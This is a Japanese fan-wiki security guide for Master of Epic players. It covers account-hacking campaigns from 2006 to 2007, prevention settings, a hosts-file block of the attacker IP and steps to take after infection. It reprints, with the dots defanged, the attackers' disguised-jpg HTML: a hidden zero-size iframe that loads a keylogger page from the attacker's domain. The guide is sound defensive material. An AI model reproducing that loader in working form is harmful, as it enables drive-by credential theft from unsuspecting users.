安全のために - moe @Wiki

Top > 安全のために

安全のために

{海外（特に中華系）のアカウントハックに要注意 };

何が起こっているのか？

2006年10月頃から、海外（特に中華系）からオンラインゲームを狙ったアカウントハックが多発しています。
その多くはRMT（現金取引）の業者といわれています。
アップローダに当時（2006/10）上げられた中華のHTML偽装jpgですが

ドメイン情報　www■zhangweijp■com 61.139.126.10
country: CN
CHINANET Sichuan province network (シナ四川省)
61.139.0.0 - 61.139.127.255

あきらかにROで各種サイトにリンクを貼り付けてアカウントハックの被害を出しまくった 中国人アカウントハック集団のサイトです。(www■zhangweijp■comでググるわかる)

またリネージュでも被害が確認されている老舗(?)アカウントハックサイトです
tmsn.exeという実行ファイルを強制DLさせられるので注意

これ以外にも様々なものがあります。上記URL以外にも十分気を付けましょう
RagnarokOnlineやリネージュなどが被害の中心でしたが、その範囲はどんどん広まっています。
Master of Epicも例外ではなく、実際に罠を仕掛けられたことがあります（後述）。
2007/05/24頃からはゲーム内の募集チャットなどにURLをかき、興味を持った人にアクセスさせる手段も使われ始めました。
（これは中国人とは関係ないのかもしれませんが）

どんな手を使っているのか？

2007年3月段階で確認されているものをあげておきます。時間の経過に伴い新しい手段が出てくると思われます。

• jpg偽装型
  • アップローダーなどにjpg画像ファイルに偽装をし、アカウントハックサイトに飛ばす罠を仕込む
  • コメントに「Dツアーおつかれさま」などと書き込み、警戒を解かせ踏む様に仕掛けています
  • InternetExplorerやIEコンポーネントのブラウザで踏むとキーロガー等を仕込まれます。
  • 中身は下記のようなものが一例

    <html>
    <iframe src="http://www■zhangweijp■com/tt2/index■htm" width="0" height="0" frameborder="0"></iframe>
    <center><img src="http://www■zhangweijp■com/jpg/001■jpg"></center>
    </html>
    （上記は元ソースから.（ドット）を■に置き換えてある）
    

  • 罠jpgのURLを2chの掲示板などに貼り付けたりということもある
• Wiki編集型
  • Wikiの編集しやすさを逆手に取り、リンクをアカウントハックサイトに書き換える
  • このWikiでは外部へのリンクに記号がつきます 参考：http://moepic.com/ ←一番右にあるマークが外部リンクの印
  • 外部リンクの際には飛ぶ先が本当に正しいか注意してください
• Blogコメント型
  • 個人の運営するBlogに、興味を持つようなコメントを付けることでURLへと誘導する手口。
  • 例えば、「Blog移転しました、今度からはこっちをブックマークお願いします」など。
• ネットカフェ仕込み型
  • 不特定多数の人が使うネットカフェにキーロガーなどを仕込む方法

ゲーム内の中国人と思われる集団について

• 主にエイシスケイブやミッシーを中心として、ほぼ24時間活動していてピンイン語を主に使う集団が確認されています。
• 彼らの多くは「中国人で、RMT目的とした業者」であると考えられています。
• 運営のゴンゾロッソは「直接、迷惑行為など被害を受けた場合」に限り、以下のものをあわせて連絡することで、「調査対象」とするようである。
  • 該当キャラクター名
  • 該当する発言の会話ログ
  • 該当する行為および発言を受けた日時
  • 該当する行為および発言を受けた場所
• 事実上、狩場を占有している（これ自体はほめられはしないが禁止でもない）に過ぎないため、上記のような証拠をプレイヤーで押さえることは難しい
• また、迷惑な存在ではあるがRMT業者であるという直接的な証拠もないのでいかんともしがたい
• あくまで「一般プレイヤー間の問題」ということで、フィルターに入れるなど各個人の対策に委ねられているのが現状

何をすればいいの？

以下は要点となります。higaitaisaku.comさんの『被害対策』→『転ばぬ先の杖』（http://www.higaitaisaku.com/korobanu.html）が参考になるでしょう。

• 基本
  • 定期的なWindowsUpdate及び、各種ソフト(メディアプレーヤ等)のアップデート
  • アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新
  • パーソナルファイアーウォールソフトの導入
  • アドレスをホイホイ踏まない。よく確認する。「ソースチェッカーオンライン」などのブラクラチェックサイトを利用する。
  • 出所の怪しいプログラムやスクリプトを実行しない
• 応用
  • IEの使用を止め、他のブラウザに乗り換える (Firefox、Opera)
  • IEコンポーネント使用のブラウザを使う (セキュリティ設定が容易な物が多い)
  • 信頼できるSite以外ではスクリプトやActiveXを切る
    • インターネットオプションのセキュリティの部分で設定可能
  • 偽装jpg対策 (IE6sp2 と IE7限定。IE6sp1以前では出来ない)
    • インターネットオプション→セキュリティ→レベルのカスタマイズ→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

何をすればいいの？もっと詳しく

• 接続禁止IPレンジの設定
  • セキュリティソフト等で61.139.0.0 - 61.139.127.255を接続禁止IPレンジとして登録しておきましょう。万が一踏んだとしても接続拒否しておけば被害を防止できます
  • ファイアウォールソフトごとに設定の可否、またその方法も違うようです

• hosts編集 (接続拒否設定)
  --hostsが何かについてはこちら参照
  • Windows XP、Windows Server 2003 の場合 : c:\windows\system32\drivers\etc\hosts
  • Windows 2000 の場合 : c:\winnt\system32\drivers\etc\hosts
  • 編集はtxt editorで行えます
  • 編集後は上書き禁止にすること

    # Copyright (c) 1993-1999 Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      102.54.94.97     rhino.acme.com          # source server
    #       38.25.63.10     x.acme.com              # x client host
    
    127.0.0.1       localhost
    0.0.0.0 61.139.126.10
    

• #の行はコメントなのでなくてもよいです

PCにウィルス対策ソフトを導入してない方へ

※一種類で安心しないように

• avast!アンチウイルス　有料版と無料版があり、どちらも60日目以降はどちらもユーザー登録（＋有料版は料金の支払い）が必要
  • http://www.avast.com/index_jpn.html
• ZoneAlarm（ファイヤーウォールソフト　基本機能だけの無料版アリ）オンラインスパイウェアスキャンも。
  • http://www.zonealarm.com/store/content/company/products/znalm/freeDownload.jsp?dc=34std&ctry=EU&lang=en
• トレンドマイクロ　ウイルスバスターオンラインスキャン
  • http://www.trendmicro.co.jp/hcall/index.asp
• Ad-Aware SE　スパイウェア対策ソフト　有料の「Professional」「Plus」と無料の「Personal」がある。
  • http://www.lavasoft.com/products/ad-aware_se_personal.php
• Spybot　無料のスパイウェア対策ソフト
  • http://enchanting.cside.com/security/spybot1.html
• Kaspersky Anti-Virus (体験版)　オンライン ウイルス＆スパイウェアスキャナもあり
  • http://www.kaspersky.co.jp/
• NOD32 アンチウイルス (体験版)
  • http://www.canon-sol.jp/product/nd/trial.html

2chのネトゲ実況3のスレにこれらのアドレス（アップローダーのjpgや、アカウントハックサイトそのもの等）のURLが貼られる事が稀に出始めています。 また、このページと同じように警戒を呼びかける文章で、ウイルス対策ソフトや対策ページのURLがアカウントハックサイトのものに変えられている事もあります。 十分に気を付けましょう。

アカウントハックされても基本的に自己責任となり、また、失ったアイテムやアカウントを復元する事は不可能です。 自分の身は自分で守りましょう。

怪しいファイルを踏んでしまったときには

感染したと思ったら？

1. まずは落ち着きましょう
   • 冷静に対処を行う必要があります
   • どういう状況で感染したか (したと思ったのか)をキチンと把握(若しくはメモ)して下さい。再発防止・原因究明に役立ちます
2. LANケーブル/電話線を引っこ抜きましょう
   • 既にID&Passを送信されていなければ、単純ですが最も効果の有る処置です(参考)
   • ケーブルを繋いだ状態、若しくは加えてMoEを起動したり公式をブラウザで開いたりは絶対に行ってはいけません。ID/Passwordが漏洩する恐れがあります
3. 安全と思われるPCより公式にアクセス、Passwordを変更する
   • ウイルス感染中のPCを決して使用してはいけません。
   • 他にPCを所持してない場合は、下の『注意』の項を参照の事
4. システムの復元オプションを無効にする (Windows Me/XP)
   • 何とかシステムを復旧させてもバックアップから復活されては意味が有りません
   • WindowsMEの方法 と WindowsXPの方法 を参考にして下さい (シマンテックSiteより)
   • WindowsFAQも参考になるでしょう
   • 完全復旧後はこれと逆の操作を行い、復旧オプションを有効化させましょう
5. アンチウイルスソフトとスパイウェア検出ソフトでPCをチェックする
   • 必須です。出来るだけ最新の定義ファイルである事が望ましいです (*1)
   • アンチウイルスソフト等が入ってない場合は、速攻買ってくるか安全と思われる別のPC経由で手に入れるべきです (*2)
   • オンラインスキャンという手も有りますが、Networkに繋がっているという事は危機(*3)に晒されているのと同義であり、全くお勧め出来ません
   • アンチウイルスソフトの探知から逃れるべくウイルスは日々改造されています。よって仮に検出されなくても100%安心できるとは言えません
   • 上手く削除できない場合はセーフモードやコマンドプロンプトオンリーのモードで起動して対処する事も考慮に入れて下さい (Win98/Meの場合はPC起動時にctrlキーを、WIn95/2k/XPの場合はF8キーを押しつづければOK)
6. それでも不安なら…
   • PCの再セットアップ(OSのクリーンインストール)を行いましょう。セキュリティパッチ等のアップデートは必須です
   • アカウントハック関連のウイルスは感染性が弱めなので、感染に対して多少の注意をしながら行えば大体消えてくれます
7. 公的機関への届け出
   • 実際に被害があった場合は正真正銘の犯罪ですので警察への届出は重要です
   • 警察庁サイバー犯罪対策あたりから窓口を探しましょう(*4)
   • また、独立行政法人 情報処理推進機構 セキュリティセンター(IPA/ISEC)への届出も重要です。
     統計データ上、オンラインゲーム関連の被害が増えている事が明白となれば、研究課題として取り挙げられる可能性も高くなります。
   • IPA/ISEC 情報セキュリティに関する届出について
8. ゴンゾロッソへ報告を行う
   • あまり期待は出来ませんが、やっておくに越した事は無いです

• 注意
  • 基本は 感染PCのNetworkからの隔離 と 迅速な処置 です
  • 安全と思われるPCが無い場合は各自のスキルに依存します。以下の選択枝を考慮してください
    1. 手動/ソフトによるウイルス削除を頑張って行う (その後にPassword変更)
    2. PCの再セットアップを頑張って行う (その後にPassword変更)
    3. 友人のPCやネットカフェ利用
    4. 1CD Linuxの利用 (Wikipedia：1CD Linux)。
  • 清浄化を確認するまでMoE関連のプログラムやSiteに近寄らずにお掃除作業を行えばウイルスの悪影響から回避出来るかもしれませんが（多くはキーロガーやメモリサーチタイプと推測されるので、ID&Passを打たなければ良いかもしれない）、安全な橋とは言い難いのを付け加えておきます

どう考えてもトロイっぽいのが動いているかどうか、まずはプロセスマネージャで確認

• マカフィーのサイト よくある質問: タスクマネージャを利用して実行中のプロセスを停止させる方法
  • http://www.mcafee.com/japan/mcafee/support/faq/answer_f_alert.asp?wk=AR-00008
• Windowsの「タスクマネージャ」を便利に使う3つのTips
  • http://www.itmedia.co.jp/bizid/articles/0703/06/news050.html
• プロセス? :マルチタスクOS環境におけるプログラムの実行単位。
  • http://www.atmarkit.co.jp/icd/root/78/5787378.html
• Windowsのスタートアップやタスクマネージャに現れるプロセス、実行ファイルのリスト
  • http://cowscorpion.com/tasklist/index.html
    • プロセスの名前と内容がよく判らない時はここで。通常存在しないプロセスを発見したらググル前にここで調べる事。問題のないプロセスを勘違いして殺さないように。
• ベクター :プロセス関係のソフトウェアDLサービス
  • http://www.vector.co.jp/vpack/filearea/win/util/task/

スタート→「ファイル名を指定して実行」→ 名前(O): のところへ　msconfig　と入れ OK
システム構成ユーティリティが起動するので一番左のタブ「スタートアップ」を選択

スタートアップ項目、コマンドを確認して その壱で見つけたトロイ実行プロセス(exe)が
無いか確認する。存在する場合はその部分のスタートアップ項目からチェックを外す
ちなみに"コマンド"部分にはその実行ファイル(exe)が存在する場所が書かれているので
そのフォルダを開いて後で削除できるように覚えておく事※1

OKを押すと「システム構成の変更を有効にするには、再起動する必要があります」と表示されるので
ブラウザなどの実行されているプログラムを全て閉じてから再起動(R)を押す。
念のために再起動する前にネット接続を物理的に遮断しておくとより安全。
再起動したらもう一度プロセスマネージャからトロイが実行されていないか確認する。
プロセスマネージャに存在していなければ※1で調べておいたフォルダを開き、
該当する実行ファイル(exe)を削除もしくは拡張子をexeからbakなどに変更して実行できなくする。
万が一、間違っていた場合に備えて拡張子を変更するだけにしておけば復元も出来る

謝辞

このページを書くにあたり非常に参考にさせていただきました(*5)
参考： http://smith.xrea.jp/?Security

どうもありがとうございます。